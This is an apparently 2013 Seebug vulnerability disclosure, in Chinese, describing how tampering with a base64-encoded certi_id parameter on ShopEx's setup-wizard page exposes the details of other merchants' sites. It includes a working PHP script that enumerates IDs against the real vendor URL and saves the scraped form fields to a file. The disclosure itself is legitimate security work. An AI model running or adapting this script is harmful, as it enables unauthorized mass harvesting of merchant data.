ShopEx某接口缺陷可遍历所有用户网站

2013-08-07T00:00:00
ID SSV:93455
Type seebug
Reporter Root
Modified 2013-08-07T00:00:00

Description

简要描述:

ShopEx某接口缺陷,可遍历所有网站

详细说明:

问题出现在shopex 网店使用向导页面 http://guide.ecos.shopex.cn/step2.php?refer=eyJjZXJ0aV9pZCI6MTA1MSwiY2FsbGJhY2tfdXJsIjoiaHR0cDpcL1wvd3d3LmVrYWlkaWFuLmNvbVwvIn0= refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"} 我们修改certi_id 即可遍历所有使用了ShopEx程序的网站

<?php for ($i=1; $i < 10000; $i++) { //遍历 ShowshopExD($i); } function ShowshopExD($cid) { $url='http://guide.ecos.shopex.cn/step2.php'; $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}'); $url = $url.'?refer='.$refer; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ; $result = curl_exec($ch); $result = mb_convert_encoding($result, "gb2312", "UTF-8"); if(strpos($result,$refer)) { $fp = fopen("c:/shopEx.txt",'ab'); //保存文件 preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value); foreach ($value[1] as $key) { preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res); echo $res[1][0].':'.$res[3][0]."\r\n"; $col =$res[1][0].':'.$res[3][0]."\r\n"; fwrite($fp, $col, strlen($col)); } echo '--------------------------------'."\r\n"; fclose($fp); } flush(); curl_close($ch); } ?>

漏洞证明:

<img src="https://images.seebug.org/upload/201308/07100834baff87bc53a37f99e4b7fb73448f5ab9.jpg" alt="QQ截图20130807100758.jpg" width="600" onerror="javascript:errimg(this);">